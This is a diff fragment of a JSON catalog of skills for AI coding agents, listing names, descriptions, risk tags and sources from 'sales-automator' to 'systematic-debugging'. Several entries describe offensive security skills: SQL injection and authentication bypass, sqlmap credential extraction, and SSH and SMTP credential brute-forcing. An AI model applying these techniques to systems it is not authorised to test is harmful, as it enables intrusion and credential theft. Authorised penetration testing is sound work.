+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "sales-automator",
+ "path": "skills/sales-automator",
+ "category": "uncategorized",
+ "name": "sales-automator",
+ "description": "Draft cold emails, follow-ups, and proposal templates. Creates\npricing pages, case studies, and sales scripts. Use PROACTIVELY for sales\noutreach or lead nurturing.\n",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "salesforce-automation",
+ "path": "skills/salesforce-automation",
+ "category": "uncategorized",
+ "name": "salesforce-automation",
+ "description": "Automate Salesforce tasks via Rube MCP (Composio): leads, contacts, accounts, opportunities, SOQL queries. Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "salesforce-development",
+ "path": "skills/salesforce-development",
+ "category": "uncategorized",
+ "name": "salesforce-development",
+ "description": "Expert patterns for Salesforce platform development including Lightning Web Components (LWC), Apex triggers and classes, REST/Bulk APIs, Connected Apps, and Salesforce DX with scratch orgs and 2nd ...",
+ "risk": "unknown",
+ "source": "vibeship-spawner-skills (Apache 2.0)",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "sast-configuration",
+ "path": "skills/sast-configuration",
+ "category": "uncategorized",
+ "name": "sast-configuration",
+ "description": "Configure Static Application Security Testing (SAST) tools for automated vulnerability detection in application code. Use when setting up security scanning, implementing DevSecOps practices, or aut...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "scala-pro",
+ "path": "skills/scala-pro",
+ "category": "uncategorized",
+ "name": "scala-pro",
+ "description": "Master enterprise-grade Scala development with functional programming, distributed systems, and big data processing. Expert in Apache Pekko, Akka, Spark, ZIO/Cats Effect, and reactive architectures.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "scanning-tools",
+ "path": "skills/scanning-tools",
+ "category": "uncategorized",
+ "name": "scanning-tools",
+ "description": "This skill should be used when the user asks to \"perform vulnerability scanning\", \"scan networks for open ports\", \"assess web application security\", \"scan wireless networks\", \"detec...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "schema-markup",
+ "path": "skills/schema-markup",
+ "category": "uncategorized",
+ "name": "schema-markup",
+ "description": "Design, validate, and optimize schema.org structured data for eligibility, correctness, and measurable SEO impact.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "screen-reader-testing",
+ "path": "skills/screen-reader-testing",
+ "category": "uncategorized",
+ "name": "screen-reader-testing",
+ "description": "Test web applications with screen readers including VoiceOver, NVDA, and JAWS. Use when validating screen reader compatibility, debugging accessibility issues, or ensuring assistive technology supp...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "screenshots",
+ "path": "skills/screenshots",
+ "category": "uncategorized",
+ "name": "screenshots",
+ "description": "Generate marketing screenshots of your app using Playwright. Use when the user wants to create screenshots for Product Hunt, social media, landing pages, or documentation.",
+ "risk": "safe",
+ "source": "https://github.com/Shpigford/skills/tree/main/screenshots",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "scroll-experience",
+ "path": "skills/scroll-experience",
+ "category": "uncategorized",
+ "name": "scroll-experience",
+ "description": "Expert in building immersive scroll-driven experiences - parallax storytelling, scroll animations, interactive narratives, and cinematic web experiences. Like NY Times interactives, Apple product p...",
+ "risk": "unknown",
+ "source": "vibeship-spawner-skills (Apache 2.0)",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "search-specialist",
+ "path": "skills/search-specialist",
+ "category": "uncategorized",
+ "name": "search-specialist",
+ "description": "Expert web researcher using advanced search techniques and",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "secrets-management",
+ "path": "skills/secrets-management",
+ "category": "uncategorized",
+ "name": "secrets-management",
+ "description": "Implement secure secrets management for CI/CD pipelines using Vault, AWS Secrets Manager, or native platform solutions. Use when handling sensitive credentials, rotating secrets, or securing CI/CD ...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "security-audit",
+ "path": "skills/security-audit",
+ "category": "workflow-bundle",
+ "name": "security-audit",
+ "description": "Comprehensive security auditing workflow covering web application testing, API security, penetration testing, vulnerability scanning, and security hardening.",
+ "risk": "safe",
+ "source": "personal",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "security-auditor",
+ "path": "skills/security-auditor",
+ "category": "uncategorized",
+ "name": "security-auditor",
+ "description": "Expert security auditor specializing in DevSecOps, comprehensive cybersecurity, and compliance frameworks.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "security-bluebook-builder",
+ "path": "skills/security-bluebook-builder",
+ "category": "uncategorized",
+ "name": "security-bluebook-builder",
+ "description": "Build security Blue Books for sensitive apps",
+ "risk": "safe",
+ "source": "https://github.com/SHADOWPR0/security-bluebook-builder",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "security-compliance-compliance-check",
+ "path": "skills/security-compliance-compliance-check",
+ "category": "uncategorized",
+ "name": "security-compliance-compliance-check",
+ "description": "You are a compliance expert specializing in regulatory requirements for software systems including GDPR, HIPAA, SOC2, PCI-DSS, and other industry standards. Perform compliance audits and provide im...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "security-requirement-extraction",
+ "path": "skills/security-requirement-extraction",
+ "category": "uncategorized",
+ "name": "security-requirement-extraction",
+ "description": "Derive security requirements from threat models and business context. Use when translating threats into actionable requirements, creating security user stories, or building security test cases.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "security-scanning-security-dependencies",
+ "path": "skills/security-scanning-security-dependencies",
+ "category": "uncategorized",
+ "name": "security-scanning-security-dependencies",
+ "description": "You are a security expert specializing in dependency vulnerability analysis, SBOM generation, and supply chain security. Scan project dependencies across ecosystems to identify vulnerabilities, ass...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "security-scanning-security-hardening",
+ "path": "skills/security-scanning-security-hardening",
+ "category": "uncategorized",
+ "name": "security-scanning-security-hardening",
+ "description": "Coordinate multi-layer security scanning and hardening across application, infrastructure, and compliance controls.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "security-scanning-security-sast",
+ "path": "skills/security-scanning-security-sast",
+ "category": "uncategorized",
+ "name": "security-scanning-security-sast",
+ "description": "Static Application Security Testing (SAST) for code vulnerability\nanalysis across multiple languages and frameworks\n",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "segment-automation",
+ "path": "skills/segment-automation",
+ "category": "uncategorized",
+ "name": "segment-automation",
+ "description": "Automate Segment tasks via Rube MCP (Composio): track events, identify users, manage groups, page views, aliases, batch operations. Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "segment-cdp",
+ "path": "skills/segment-cdp",
+ "category": "uncategorized",
+ "name": "segment-cdp",
+ "description": "Expert patterns for Segment Customer Data Platform including Analytics.js, server-side tracking, tracking plans with Protocols, identity resolution, destinations configuration, and data governance ...",
+ "risk": "unknown",
+ "source": "vibeship-spawner-skills (Apache 2.0)",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "sendgrid-automation",
+ "path": "skills/sendgrid-automation",
+ "category": "uncategorized",
+ "name": "sendgrid-automation",
+ "description": "Automate SendGrid email operations including sending emails, managing contacts/lists, sender identities, templates, and analytics via Rube MCP (Composio). Always search tools first for current sche...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "senior-architect",
+ "path": "skills/senior-architect",
+ "category": "uncategorized",
+ "name": "senior-architect",
+ "description": "Comprehensive software architecture skill for designing scalable, maintainable systems using ReactJS, NextJS, NodeJS, Express, React Native, Swift, Kotlin, Flutter, Postgres, GraphQL, Go, Python. I...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "senior-fullstack",
+ "path": "skills/senior-fullstack",
+ "category": "uncategorized",
+ "name": "senior-fullstack",
+ "description": "Comprehensive fullstack development skill for building complete web applications with React, Next.js, Node.js, GraphQL, and PostgreSQL. Includes project scaffolding, code quality analysis, architec...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "sentry-automation",
+ "path": "skills/sentry-automation",
+ "category": "uncategorized",
+ "name": "sentry-automation",
+ "description": "Automate Sentry tasks via Rube MCP (Composio): manage issues/events, configure alerts, track releases, monitor projects and teams. Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "seo-audit",
+ "path": "skills/seo-audit",
+ "category": "uncategorized",
+ "name": "seo-audit",
+ "description": "Diagnose and audit SEO issues affecting crawlability, indexation, rankings, and organic performance.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "seo-authority-builder",
+ "path": "skills/seo-authority-builder",
+ "category": "uncategorized",
+ "name": "seo-authority-builder",
+ "description": "Analyzes content for E-E-A-T signals and suggests improvements to\nbuild authority and trust. Identifies missing credibility elements. Use\nPROACTIVELY for YMYL topics.\n",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "seo-cannibalization-detector",
+ "path": "skills/seo-cannibalization-detector",
+ "category": "uncategorized",
+ "name": "seo-cannibalization-detector",
+ "description": "Analyzes multiple provided pages to identify keyword overlap and potential cannibalization issues. Suggests differentiation strategies. Use PROACTIVELY when reviewing similar content.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "seo-content-auditor",
+ "path": "skills/seo-content-auditor",
+ "category": "uncategorized",
+ "name": "seo-content-auditor",
+ "description": "Analyzes provided content for quality, E-E-A-T signals, and SEO best practices. Scores content and provides improvement recommendations based on established guidelines.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "seo-content-planner",
+ "path": "skills/seo-content-planner",
+ "category": "uncategorized",
+ "name": "seo-content-planner",
+ "description": "Creates comprehensive content outlines and topic clusters for SEO.\nPlans content calendars and identifies topic gaps. Use PROACTIVELY for content\nstrategy and planning.\n",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "seo-content-refresher",
+ "path": "skills/seo-content-refresher",
+ "category": "uncategorized",
+ "name": "seo-content-refresher",
+ "description": "Identifies outdated elements in provided content and suggests updates to maintain freshness. Finds statistics, dates, and examples that need updating. Use PROACTIVELY for older content.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "seo-content-writer",
+ "path": "skills/seo-content-writer",
+ "category": "uncategorized",
+ "name": "seo-content-writer",
+ "description": "Writes SEO-optimized content based on provided keywords and topic briefs. Creates engaging, comprehensive content following best practices. Use PROACTIVELY for content creation tasks.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "seo-forensic-incident-response",
+ "path": "skills/seo-forensic-incident-response",
+ "category": "uncategorized",
+ "name": "seo-forensic-incident-response",
+ "description": "Investigate sudden drops in organic traffic or rankings and run a structured forensic SEO incident response with triage, root-cause analysis and recovery plan.",
+ "risk": "safe",
+ "source": "original",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "seo-fundamentals",
+ "path": "skills/seo-fundamentals",
+ "category": "uncategorized",
+ "name": "seo-fundamentals",
+ "description": "Core principles of SEO including E-E-A-T, Core Web Vitals, technical foundations, content quality, and how modern search engines evaluate pages.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "seo-keyword-strategist",
+ "path": "skills/seo-keyword-strategist",
+ "category": "uncategorized",
+ "name": "seo-keyword-strategist",
+ "description": "Analyzes keyword usage in provided content, calculates density, suggests semantic variations and LSI keywords based on the topic. Prevents over-optimization. Use PROACTIVELY for content optimization.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "seo-meta-optimizer",
+ "path": "skills/seo-meta-optimizer",
+ "category": "uncategorized",
+ "name": "seo-meta-optimizer",
+ "description": "Creates optimized meta titles, descriptions, and URL suggestions based on character limits and best practices. Generates compelling, keyword-rich metadata. Use PROACTIVELY for new content.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "seo-snippet-hunter",
+ "path": "skills/seo-snippet-hunter",
+ "category": "uncategorized",
+ "name": "seo-snippet-hunter",
+ "description": "Formats content to be eligible for featured snippets and SERP features. Creates snippet-optimized content blocks based on best practices. Use PROACTIVELY for question-based content.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "seo-structure-architect",
+ "path": "skills/seo-structure-architect",
+ "category": "uncategorized",
+ "name": "seo-structure-architect",
+ "description": "Analyzes and optimizes content structure including header hierarchy, suggests schema markup, and internal linking opportunities. Creates search-friendly content organization.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "server-management",
+ "path": "skills/server-management",
+ "category": "uncategorized",
+ "name": "server-management",
+ "description": "Server management principles and decision-making. Process management, monitoring strategy, and scaling decisions. Teaches thinking, not commands.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "service-mesh-expert",
+ "path": "skills/service-mesh-expert",
+ "category": "uncategorized",
+ "name": "service-mesh-expert",
+ "description": "Expert service mesh architect specializing in Istio, Linkerd, and cloud-native networking patterns. Masters traffic management, security policies, observability integration, and multi-cluster mesh con",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "service-mesh-observability",
+ "path": "skills/service-mesh-observability",
+ "category": "uncategorized",
+ "name": "service-mesh-observability",
+ "description": "Implement comprehensive observability for service meshes including distributed tracing, metrics, and visualization. Use when setting up mesh monitoring, debugging latency issues, or implementing SL...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "shader-programming-glsl",
+ "path": "skills/shader-programming-glsl",
+ "category": "uncategorized",
+ "name": "shader-programming-glsl",
+ "description": "Expert guide for writing efficient GLSL shaders (Vertex/Fragment) for web and game engines, covering syntax, uniforms, and common effects.",
+ "risk": "safe",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "sharp-edges",
+ "path": "skills/sharp-edges",
+ "category": "uncategorized",
+ "name": "sharp-edges",
+ "description": "Identify error-prone APIs and dangerous configurations",
+ "risk": "safe",
+ "source": "https://github.com/trailofbits/skills/tree/main/plugins/sharp-edges",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "shellcheck-configuration",
+ "path": "skills/shellcheck-configuration",
+ "category": "uncategorized",
+ "name": "shellcheck-configuration",
+ "description": "Master ShellCheck static analysis configuration and usage for shell script quality. Use when setting up linting infrastructure, fixing code issues, or ensuring script portability.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "shodan-reconnaissance",
+ "path": "skills/shodan-reconnaissance",
+ "category": "uncategorized",
+ "name": "shodan-reconnaissance",
+ "description": "This skill should be used when the user asks to \"search for exposed devices on the internet,\" \"perform Shodan reconnaissance,\" \"find vulnerable services using Shodan,\" \"scan IP ranges...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "shopify-apps",
+ "path": "skills/shopify-apps",
+ "category": "uncategorized",
+ "name": "shopify-apps",
+ "description": "Expert patterns for Shopify app development including Remix/React Router apps, embedded apps with App Bridge, webhook handling, GraphQL Admin API, Polaris components, billing, and app extensions. U...",
+ "risk": "unknown",
+ "source": "vibeship-spawner-skills (Apache 2.0)",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "shopify-automation",
+ "path": "skills/shopify-automation",
+ "category": "uncategorized",
+ "name": "shopify-automation",
+ "description": "Automate Shopify tasks via Rube MCP (Composio): products, orders, customers, inventory, collections. Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "shopify-development",
+ "path": "skills/shopify-development",
+ "category": "uncategorized",
+ "name": "shopify-development",
+ "description": "Build Shopify apps, extensions, themes using GraphQL Admin API, Shopify CLI, Polaris UI, and Liquid.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "signup-flow-cro",
+ "path": "skills/signup-flow-cro",
+ "category": "uncategorized",
+ "name": "signup-flow-cro",
+ "description": "When the user wants to optimize signup, registration, account creation, or trial activation flows. Also use when the user mentions \"signup conversions,\" \"registration friction,\" \"signup...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "similarity-search-patterns",
+ "path": "skills/similarity-search-patterns",
+ "category": "uncategorized",
+ "name": "similarity-search-patterns",
+ "description": "Implement efficient similarity search with vector databases. Use when building semantic search, implementing nearest neighbor queries, or optimizing retrieval performance.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "skill-creator",
+ "path": "skills/skill-creator",
+ "category": "meta",
+ "name": "skill-creator",
+ "description": "This skill should be used when the user asks to create a new skill, build a skill, make a custom skill, develop a CLI skill, or wants to extend the CLI with new capabilities. Automates the entire s...",
+ "risk": "safe",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "skill-creator-ms",
+ "path": "skills/skill-creator-ms",
+ "category": "uncategorized",
+ "name": "skill-creator-ms",
+ "description": "Guide for creating effective skills for AI coding agents working with Azure SDKs and Microsoft Foundry services. Use when creating new skills or updating existing skills.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "skill-developer",
+ "path": "skills/skill-developer",
+ "category": "uncategorized",
+ "name": "skill-developer",
+ "description": "Create and manage Claude Code skills following Anthropic best practices. Use when creating new skills, modifying skill-rules.json, understanding trigger patterns, working with hooks, debugging skil...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "skill-rails-upgrade",
+ "path": "skills/skill-rails-upgrade",
+ "category": "uncategorized",
+ "name": "skill-rails-upgrade",
+ "description": "Analyze Rails apps and provide upgrade assessments",
+ "risk": "safe",
+ "source": "https://github.com/robzolkos/skill-rails-upgrade",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "skill-seekers",
+ "path": "skills/skill-seekers",
+ "category": "uncategorized",
+ "name": "skill-seekers",
+ "description": "-Automatically convert documentation websites, GitHub repositories, and PDFs into Claude AI skills in minutes.",
+ "risk": "safe",
+ "source": "https://github.com/yusufkaraaslan/Skill_Seekers",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "slack-automation",
+ "path": "skills/slack-automation",
+ "category": "uncategorized",
+ "name": "slack-automation",
+ "description": "Automate Slack messaging, channel management, search, reactions, and threads via Rube MCP (Composio). Send messages, search conversations, manage channels/users, and react to messages programmatica...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "slack-bot-builder",
+ "path": "skills/slack-bot-builder",
+ "category": "uncategorized",
+ "name": "slack-bot-builder",
+ "description": "Build Slack apps using the Bolt framework across Python, JavaScript, and Java. Covers Block Kit for rich UIs, interactive components, slash commands, event handling, OAuth installation flows, and W...",
+ "risk": "unknown",
+ "source": "vibeship-spawner-skills (Apache 2.0)",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "slack-gif-creator",
+ "path": "skills/slack-gif-creator",
+ "category": "uncategorized",
+ "name": "slack-gif-creator",
+ "description": "Knowledge and utilities for creating animated GIFs optimized for Slack. Provides constraints, validation tools, and animation concepts. Use when users request animated GIFs for Slack like \"...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "slo-implementation",
+ "path": "skills/slo-implementation",
+ "category": "uncategorized",
+ "name": "slo-implementation",
+ "description": "Define and implement Service Level Indicators (SLIs) and Service Level Objectives (SLOs) with error budgets and alerting. Use when establishing reliability targets, implementing SRE practices, or m...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "smtp-penetration-testing",
+ "path": "skills/smtp-penetration-testing",
+ "category": "uncategorized",
+ "name": "smtp-penetration-testing",
+ "description": "This skill should be used when the user asks to \"perform SMTP penetration testing\", \"enumerate email users\", \"test for open mail relays\", \"grab SMTP banners\", \"brute force email cre...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "social-content",
+ "path": "skills/social-content",
+ "category": "uncategorized",
+ "name": "social-content",
+ "description": "When the user wants help creating, scheduling, or optimizing social media content for LinkedIn, Twitter/X, Instagram, TikTok, Facebook, or other platforms. Also use when the user mentions 'LinkedIn...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "software-architecture",
+ "path": "skills/software-architecture",
+ "category": "uncategorized",
+ "name": "software-architecture",
+ "description": "Guide for quality focused software architecture. This skill should be used when users want to write code, design architecture, analyze code, in any case that relates to software development.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "solidity-security",
+ "path": "skills/solidity-security",
+ "category": "uncategorized",
+ "name": "solidity-security",
+ "description": "Master smart contract security best practices to prevent common vulnerabilities and implement secure Solidity patterns. Use when writing smart contracts, auditing existing contracts, or implementin...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "spark-optimization",
+ "path": "skills/spark-optimization",
+ "category": "uncategorized",
+ "name": "spark-optimization",
+ "description": "Optimize Apache Spark jobs with partitioning, caching, shuffle optimization, and memory tuning. Use when improving Spark performance, debugging slow jobs, or scaling data processing pipelines.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "sql-injection-testing",
+ "path": "skills/sql-injection-testing",
+ "category": "uncategorized",
+ "name": "sql-injection-testing",
+ "description": "This skill should be used when the user asks to \"test for SQL injection vulnerabilities\", \"perform SQLi attacks\", \"bypass authentication using SQL injection\", \"extract database inform...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "sql-optimization-patterns",
+ "path": "skills/sql-optimization-patterns",
+ "category": "uncategorized",
+ "name": "sql-optimization-patterns",
+ "description": "Master SQL query optimization, indexing strategies, and EXPLAIN analysis to dramatically improve database performance and eliminate slow queries. Use when debugging slow queries, designing database...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "sql-pro",
+ "path": "skills/sql-pro",
+ "category": "uncategorized",
+ "name": "sql-pro",
+ "description": "Master modern SQL with cloud-native databases, OLTP/OLAP optimization, and advanced query techniques. Expert in performance tuning, data modeling, and hybrid analytical systems.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "sqlmap-database-pentesting",
+ "path": "skills/sqlmap-database-pentesting",
+ "category": "uncategorized",
+ "name": "sqlmap-database-pentesting",
+ "description": "This skill should be used when the user asks to \"automate SQL injection testing,\" \"enumerate database structure,\" \"extract database credentials using sqlmap,\" \"dump tables and columns...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "square-automation",
+ "path": "skills/square-automation",
+ "category": "uncategorized",
+ "name": "square-automation",
+ "description": "Automate Square tasks via Rube MCP (Composio): payments, orders, invoices, locations. Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "ssh-penetration-testing",
+ "path": "skills/ssh-penetration-testing",
+ "category": "uncategorized",
+ "name": "ssh-penetration-testing",
+ "description": "This skill should be used when the user asks to \"pentest SSH services\", \"enumerate SSH configurations\", \"brute force SSH credentials\", \"exploit SSH vulnerabilities\", \"perform SSH tu...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "startup-analyst",
+ "path": "skills/startup-analyst",
+ "category": "uncategorized",
+ "name": "startup-analyst",
+ "description": "Expert startup business analyst specializing in market sizing, financial modeling, competitive analysis, and strategic planning for early-stage companies.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "startup-business-analyst-business-case",
+ "path": "skills/startup-business-analyst-business-case",
+ "category": "uncategorized",
+ "name": "startup-business-analyst-business-case",
+ "description": "Generate comprehensive investor-ready business case document with\nmarket, solution, financials, and strategy\n",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "startup-business-analyst-financial-projections",
+ "path": "skills/startup-business-analyst-financial-projections",
+ "category": "uncategorized",
+ "name": "startup-business-analyst-financial-projections",
+ "description": "Create detailed 3-5 year financial model with revenue, costs, cash\nflow, and scenarios\n",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "startup-business-analyst-market-opportunity",
+ "path": "skills/startup-business-analyst-market-opportunity",
+ "category": "uncategorized",
+ "name": "startup-business-analyst-market-opportunity",
+ "description": "Generate comprehensive market opportunity analysis with TAM/SAM/SOM\ncalculations\n",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "startup-financial-modeling",
+ "path": "skills/startup-financial-modeling",
+ "category": "uncategorized",
+ "name": "startup-financial-modeling",
+ "description": "This skill should be used when the user asks to \\\\\\\"create financial projections\", \"build a financial model\", \"forecast revenue\", \"calculate burn rate\", \"estimate runway\", \"model cash flow\", or...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "startup-metrics-framework",
+ "path": "skills/startup-metrics-framework",
+ "category": "uncategorized",
+ "name": "startup-metrics-framework",
+ "description": "This skill should be used when the user asks about \\\\\\\"key startup metrics\", \"SaaS metrics\", \"CAC and LTV\", \"unit economics\", \"burn multiple\", \"rule of 40\", \"marketplace metrics\", or requests...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "stitch-ui-design",
+ "path": "skills/stitch-ui-design",
+ "category": "uncategorized",
+ "name": "stitch-ui-design",
+ "description": "Expert guide for creating effective prompts for Google Stitch AI UI design tool. Use when user wants to design UI/UX in Stitch, create app interfaces, generate mobile/web designs, or needs help cra...",
+ "risk": "safe",
+ "source": "self",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "stride-analysis-patterns",
+ "path": "skills/stride-analysis-patterns",
+ "category": "uncategorized",
+ "name": "stride-analysis-patterns",
+ "description": "Apply STRIDE methodology to systematically identify threats. Use when analyzing system security, conducting threat modeling sessions, or creating security documentation.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "stripe-automation",
+ "path": "skills/stripe-automation",
+ "category": "uncategorized",
+ "name": "stripe-automation",
+ "description": "Automate Stripe tasks via Rube MCP (Composio): customers, charges, subscriptions, invoices, products, refunds. Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "stripe-integration",
+ "path": "skills/stripe-integration",
+ "category": "uncategorized",
+ "name": "stripe-integration",
+ "description": "Implement Stripe payment processing for robust, PCI-compliant payment flows including checkout, subscriptions, and webhooks. Use when integrating Stripe payments, building subscription systems, or ...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "subagent-driven-development",
+ "path": "skills/subagent-driven-development",
+ "category": "uncategorized",
+ "name": "subagent-driven-development",
+ "description": "Use when executing implementation plans with independent tasks in the current session",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "supabase-automation",
+ "path": "skills/supabase-automation",
+ "category": "uncategorized",
+ "name": "supabase-automation",
+ "description": "Automate Supabase database queries, table management, project administration, storage, edge functions, and SQL execution via Rube MCP (Composio). Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "superpowers-lab",
+ "path": "skills/superpowers-lab",
+ "category": "uncategorized",
+ "name": "superpowers-lab",
+ "description": "Lab environment for Claude superpowers",
+ "risk": "safe",
+ "source": "https://github.com/obra/superpowers-lab",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "swiftui-expert-skill",
+ "path": "skills/swiftui-expert-skill",
+ "category": "uncategorized",
+ "name": "swiftui-expert-skill",
+ "description": "Write, review, or improve SwiftUI code following best practices for state management, view composition, performance, modern APIs, Swift concurrency, and iOS 26+ Liquid Glass adoption. Use when buil...",
+ "risk": "safe",
+ "source": "https://github.com/AvdLee/SwiftUI-Agent-Skill/tree/main/swiftui-expert-skill",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "systematic-debugging",
+ "path": "skills/systematic-debugging",
+ "category": "uncategorized",
+ "name": "systematic-debugging",
+ "description": "Use when encountering any bug, test failure, or unexpected behavior, before proposing fixes",
+ "risk": "unknown",
+ "source": "community",
